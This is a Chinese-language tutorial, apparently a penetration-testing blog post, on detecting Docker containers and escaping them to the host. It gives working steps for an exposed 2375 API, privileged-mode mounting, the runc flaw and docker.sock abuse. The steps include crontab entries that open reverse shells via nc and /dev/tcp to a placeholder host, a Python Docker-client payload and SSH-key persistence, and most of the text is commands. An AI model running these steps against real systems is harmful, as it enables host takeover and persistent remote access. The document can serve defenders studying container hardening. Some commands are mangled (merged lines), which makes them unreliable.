1

ls -al

方法二：查询系统进程的 cgroup 信息是否存在 docker 字符串

1
2

ls -alh /.dockerenv
cat /proc/1/cgroup

方法三：检查是否存在 container环境变量
通过 env \ PATH 来检查是否有 docker 相关的环境变量，来辅助判断

1
2
3

env
env $PATH
set

方法四：其他检测方法
检测 mount 、 fdisk -l 查看硬盘 、 判断PID 1 的进程名等也可用来辅助判断

1
2
3

mount | grep "docker"
fdisk -l
ps -aux

确定漏洞是否存在：
访问 http://x.x.x.x:2375/version 查看是否有版本信息

1
2
3
4

#列出容器信息，效果与docker ps一致。 
curl http://<target>:2375/containers/json 
#启动容器
docker -H tcp://<target>:2375 ps -a

利用场景：通过对宿主机端口扫描，发现有 2375 端口开放，可以执行任意docker命令。我们可以据此，在宿主机上运行一个容器，然后将宿主机的根目录挂载至docker的 /mnt 目录下，便可以在容器中任意读写宿主机的文件了。我们可以将命令写入 crontab 配置文件，进行反弹shell。
我们先随便拉取一个镜像然后创建容器

1
2
3
4

docker -H tcp://ip pull busybox

#这里我们将该宿主机的根目录挂在到容器的/mnt目录下
docker -H tcp://ip:2375 run -it -v /:/mnt 容器id sh

执行之后会返回一个该容器宿主机的shell，进入 /mnt 目录( cd /mnt/ )下即可逃逸到宿主机

还可以并将宿主机的 /etc目录 挂载到容器中，便可以任意读写文件了。我们可以将命令写入 crontab配置 文件，进行反弹shell。
首先我们随意启动一个容器，然后将宿主机的 /etc 目录挂载到容器的 /tmp/etc 目录中

1

docker -H tcp://宿主ip:2375 run -it -v /test:/tmp/etc 容器id /bin/bash 

然后开启监听（这里的监听端口取决于脚本，下面的脚本中写的是8888端口，那我们就监听这个端口），
并且在容器中利用下面的脚本进行反弹

1
2
3
4

import docker

client = docker.DockerClient(base_url='http://your-ip:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc your-ip 8888 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})

然后还可以在容器中写计划任务，反弹宿主机的shell，记得监听 1234 端口

1

echo '* * * * * /bin/bash -i >& /dev/tcp/宿主机ip/1234 0>&1' >> /test/var/spool/cron/crontabs/root

如何判断当前容器是否为特权模式，输入下面的命令，如果返回为 000000xfffffffff 代表为特权模式起，x为任意数字

1

cat /proc/self/status |grep Cap

利用步骤：
使用特权模式启动一个容器，容器部分要根据实际进行修改

1

sudo docker run -itd --privileged ubuntu:latest /bin/bash

然后进入容器，用 fdisk -l 查看磁盘文件，查看到宿主机的磁盘为 /dev/vda1 ，如果有很多个的话，那就 一般是最大的那个

进行挂载，将宿主机的磁盘根目录挂载到docker容器的 /home/test 目录下

1

mount /dev/vda1 /home/test

然后切换目录到 /home/test 就可成功逃逸到宿主机目录

1

chroot /home/test

漏洞的核心问题是containerd在处理容器启动过程中对runc的调用时存在安全漏洞，攻击者可以通过构造恶意的容器镜像来实现在容器内部执行任意命令的攻击。这允许攻击者在容器内部获取宿主系统上与容器相同的权限

影响的主要版本有：

1
2
3

- Docker CE 18.09以前的版本
- Docker EE 18.09以前的版本
- RunC version <=1.0-rc6

我们用下面的命令查看一下我们的docker版本和runc版本

1
2

docker --version
runc --version

影响版本： Docker 19.03.0

1

docker run -itd -v /root:/root ubuntu:18.04 /bin/bash

写入ssh密钥进行登录

1

mkdir /root/.sshcat id_rsa.pub >> /root/.ssh/authorized_keys

判断方法：
实战中通过 find命令 ，可查找类似 docker.sock 等高危目录和文件

1

find / -name docker.sock

如果存在的话，相当于在docker里可以执行宿主机docker命令，这样的话，我们新启一个容器，挂载宿主机根目录，即可逃逸

逃逸步骤：

1

docker run -itd -v /var/run/docker.sock:/var/run/docker.sock ubuntu

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

apt-update  
apt-get install \  
apt-transport-https \  
ca-certificates \  
curl \  
gnupg-agent \  
software-properties-common  
curl -fsSL [https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg](https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/gpg) | apt-key add -  
apt-key fingerprint 0EBFCD88  
add-apt-repository \  
"deb [arch=amd64] [https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/](https://mirrors.ustc.edu.cn/docker-ce/linux/ubuntu/) \  
$(lsb_release -cs) \  
stable"  
apt-get update  
apt-get install docker-ce docker-ce-cli containerd.io

1
2
3

docker run -it -v /:/host ubuntu:latest /bin/bash
#这里的 latest 要根据实际版本修改
如：docker run -it -v /:/host ubuntu:18.04 /bin/bash